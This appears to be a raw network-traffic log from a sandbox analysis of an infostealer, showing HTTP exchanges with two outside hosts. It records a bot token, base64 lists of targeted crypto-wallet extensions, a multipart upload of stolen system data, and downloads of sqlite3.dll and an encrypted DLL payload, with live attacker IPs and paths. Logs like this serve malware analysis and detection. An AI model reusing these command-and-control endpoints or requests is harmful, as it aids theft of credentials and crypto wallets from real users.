                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:25.196687937 CET1236INData Raw: 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32
                                                                                                                                                                                                                                                            Data Ascii: cG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2F
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:25.197154999 CET1236INData Raw: 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46
                                                                                                                                                                                                                                                            Data Ascii: U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWN
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:25.197165966 CET1236INData Raw: 63 47 56 76 61 32 4a 70 61 32 68 6d 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 46 79 64 47 6c 68 62 69 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 5a 69 5a 32 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d
                                                                                                                                                                                                                                                            Data Ascii: cGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFR
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:25.197175026 CET372INData Raw: 61 32 78 69 66 44 46 38 4d 48 77 77 66 45 4e 76 62 57 31 76 62 6b 74 6c 65 58 78 6a 61 47 64 6d 5a 57 5a 71 63 47 4e 76 59 6d 5a 69 62 6e 42 74 61 57 39 72 5a 6d 70 71 59 57 64 73 59 57 68 74 62 6d 52 6c 5a 48 77 78 66 44 42 38 4d 48 78 61 62 32
                                                                                                                                                                                                                                                            Data Ascii: a2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnB
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:25.202090025 CET1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 76 63 47 5a 6e 5a 57 78 74 59 32 31 69 61 57 46 71 59 57 31 6c 63 47 35 74 62 47 39 70 61 6d 4a 77 62 32 78 6c 61 57 46 74 59 58 77 78 66 44 42 38 4d 48 78 4f 61 57 64 6f 64 47 78 35 49 46 64 68 62 47 78 6c 64 48
                                                                                                                                                                                                                                                            Data Ascii: IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXB
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:25.202512026 CET668INData Raw: 62 57 68 68 5a 6e 77 78 66 44 42 38 4d 48 78 4e 59 57 64 70 59 79 42 46 5a 47 56 75 49 46 64 68 62 47 78 6c 64 48 78 74 61 33 42 6c 5a 32 70 72 59 6d 78 72 61 32 56 6d 59 57 4e 6d 62 6d 31 72 59 57 70 6a 61 6d 31 68 59 6d 6c 71 61 47 4e 73 5a 33
                                                                                                                                                                                                                                                            Data Ascii: bWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21maGViZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGV
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:25.206188917 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJK
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Content-Length: 268
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 2d 2d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: ------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="message"fplugins------DAKFIDHDGIEGCAKFIIJK--
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:25.653259039 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:25 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Content-Length: 108
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                                            Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:26.092555046 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAA
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Content-Length: 8523
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:26.092624903 CET8523OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 47 44 41 41 4b 46 48 49 45 48 49 45 43 41 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37
                                                                                                                                                                                                                                                            Data Ascii: ------IDGDAAKFHIEHIECAFBAAContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------IDGDAAKFHIEHIECAFBAAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:27.085799932 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:26 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:27.449961901 CET94OUTGET /68b591d6548ec281/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:27.896542072 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:27 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                                            ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Length: 1106998
                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:27.896639109 CET1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: #N@B/81s:<R@B/92P @B


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            22192.168.2.449866185.156.73.23807124C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:24.381231070 CET414OUTGET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                            User-Agent: 1
                                                                                                                                                                                                                                                            Host: 185.156.73.23
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:25.708952904 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:25 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 30
                                                                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:25.980719090 CET388OUTGET /dll/key HTTP/1.1
                                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                            User-Agent: 1
                                                                                                                                                                                                                                                            Host: 185.156.73.23
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:26.462081909 CET224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:26 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 21
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                                                                                                                                                                                                                            Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:26.507416964 CET393OUTGET /dll/download HTTP/1.1
                                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                            User-Agent: 1
                                                                                                                                                                                                                                                            Host: 185.156.73.23
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:27.065468073 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:26 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                                                                                                                                                                                                                            Content-Length: 97296
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk*~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<*Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEP*OuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q*)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~|jbK!N7R}T2bsq1L^!|qD'sLnD@bn%0=bQ1+lQXO|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:27.065617085 CET1236INData Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f
                                                                                                                                                                                                                                                            Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:27.065639019 CET1236INData Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd
                                                                                                                                                                                                                                                            Data Ascii: Dp!l*R7+2J^*'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: *rUz(-dFI?[*VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:27.066118956 CET672INData Raw: 42 47 80 86 ae 70 77 dd c9 a4 43 ea 79 cc 36 24 d5 a0 a8 68 e2 19 03 24 ed 93 0c db 15 78 2a 88 5a 7c 59 51 fe c6 7c 01 35 8f e1 23 99 84 04 00 e3 d2 e6 6e e4 8f 85 26 21 77 40 81 44 b6 9f 1d 75 1d 8d 68 73 3a 7c 42 46 c1 18 9b 47 fd 90 63 33 b4
                                                                                                                                                                                                                                                            Data Ascii: BGpwCy6$h$x*Z|YQ|5#n&!w@Duhs:|BFGc3_^M*H_FJn-U,e?lzR3Ib=nuH_x}q^6vP2'\:)j!gJH:yA".E<tj)>N]
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:27.066390038 CET1236INData Raw: 5a 4e 90 47 87 8d 31 4d 04 f3 b2 8f b5 ec 0b 34 86 f5 8a 59 cc e1 31 db ef 09 6f 5f de 50 ce 55 7c bf 37 d2 26 b8 77 5e 1f 27 ab 58 1f ee ce 9b bf 8d 85 b2 80 b7 5a 06 25 9d b3 27 1c c8 e3 6c 36 e5 a3 7d 22 17 b3 13 00 d6 07 77 28 09 24 fc 89 30
                                                                                                                                                                                                                                                            Data Ascii: ZNG1M4Y1o_PU|7&w^'XZ%'l6}"w($0_g8^T1bf4n\vl)OCoKaC#/|fZyhc7LY=T(b8be@yo~YN_ozIe_*%BH1uObUR|aXyt
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:27.066406012 CET1236INData Raw: c0 da 67 42 4f 24 35 da 00 c2 9f 29 69 11 0c 49 94 a6 a7 92 c3 e7 14 45 de 79 b3 d8 e2 24 85 e6 7e c2 2a ec 32 fa 5b b8 db e4 ea 7c 97 4e cb e1 cc b0 1d f4 fb a3 05 75 fa 46 d0 b4 ab dc eb 81 ad f1 f2 0d 38 68 4a c0 b6 50 cd d7 bc 1f fb 5d 2b cf
                                                                                                                                                                                                                                                            Data Ascii: gBO$5)iIEy$~*2[|NuF8hJP]+P|;3a__JnSgph=jkKOT3e13USC'{XJdey_ p[P<M%5:,rFTgYIR)"<N3ei-IQvtB
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:27.066421986 CET1236INData Raw: ed f5 bb 67 1c b0 2e 96 1b 41 e2 4b e0 d0 c0 32 d7 54 d0 57 51 be 23 33 85 40 1d 3e 06 84 94 eb 5a 77 62 51 fd 8a 8b fe 9b 5e 14 3c 3b b6 5d 0d 8f 18 29 53 7a e3 4a 54 9e 1e 8f c8 d7 2e 61 9b 87 bb e4 ef bd c8 ac 33 94 fa df 50 e0 e1 f7 4e ef 39
                                                                                                                                                                                                                                                            Data Ascii: g.AK2TWQ#3@>ZwbQ^<;])SzJT.a3PN9Yn(X"h!rrn~O+;}?jjo-?1RXUC|B\n2/}=.H,/Ta@IEh8|[cbNVNzcY".n$GA
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:27.067250013 CET672INData Raw: 1a 2a 62 b4 ae 8a 5b 82 f2 2e 8d 4c f7 bc 4a 54 d2 2f 9c 5e d2 78 32 e3 23 07 42 8b dd c1 ad 98 37 2e 4a db d1 95 b9 bb 1a f0 cf e7 16 4b fc ec 93 ab e6 08 7e 4b 49 dc 0d 53 c5 8e 5f f2 c2 11 55 dc 53 1e 24 d4 8f 7e fa 25 60 68 8f b2 67 bd 27 d8
                                                                                                                                                                                                                                                            Data Ascii: *b[.LJT/^x2#B7.JK~KIS_US$~%`hg'?CW[MQHSB-v0< c\tMc[T4Auxxc*+hMgC]`=o8M}k+B[5Nx62G(%OrKv5H0Uq`42p0;U&
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:27.072004080 CET1236INData Raw: 34 ba a9 d6 80 6d a5 ac 9f d3 80 17 6f 02 df fe 4e 07 6d 30 c4 90 a4 8c 39 6b a3 a1 85 ab b3 ca 01 2d d7 3a ac 7a 54 7a bd ef a4 a1 a0 91 1e 78 f5 95 ac ec 47 63 7c 55 62 3c 14 a6 7c 59 c1 c9 3e 15 2e 8a 92 0f cc 20 54 75 23 66 b3 9f f4 b5 a1 18
                                                                                                                                                                                                                                                            Data Ascii: 4moNm09k-:zTzxGc|Ub<|Y>. Tu#f-UM!+g@!4<fG7IkEl#=Jdr;)\b?kkdx-<lO!2NY!8hiq[Awyw:uw%}i=M
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:27.072130919 CET1236INData Raw: fe a0 6e c3 63 7d 51 4a 88 34 c1 3b 5b 72 7c c8 f4 ed 5e 10 25 3c 74 a5 0c fe e8 35 f9 53 85 b0 7f 5b 8f 02 41 49 61 2b a3 94 34 38 d7 d1 ef ab dc af 94 18 2a 85 ec 78 08 a4 e3 07 00 19 9d a2 73 33 c8 b1 30 ca 10 53 df b9 78 4e 9a 81 9d ef 5a b3
                                                                                                                                                                                                                                                            Data Ascii: nc}QJ4;[r|^%<t5S[AIa+48*xs30SxNZCPH3U"~6GxeZE3 SZF&=Qt`d^usB53m3>g\REmge]PxofXd"JP, XU@po5a^
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:27.080406904 CET1236INData Raw: 7c dc f5 13 f0 20 79 96 b6 dc 70 60 b0 aa d7 99 89 79 7a 6c 53 96 6e a0 0b 0a f6 69 a5 56 4e eb be f5 a3 28 42 76 7d a0 af 99 3a 94 58 e7 16 a3 0d b0 73 4f 9a 66 2e c2 7e 7a 9a 14 12 fb 54 81 6f bd 0e 58 38 95 18 6e 20 4b 24 d8 d5 3a 44 1d 36 82
                                                                                                                                                                                                                                                            Data Ascii: | yp`yzlSniVN(Bv}:XsOf.~zToX8n K$:D6Z%NNng=t+L~6DtFX[a/[m[CK`<s%ICz TAy^}`dj[a9>AD&MoU$]Q,VSvD
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:27.758796930 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                            User-Agent: C
                                                                                                                                                                                                                                                            Host: 185.156.73.23
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:28.483580112 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:27 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 30
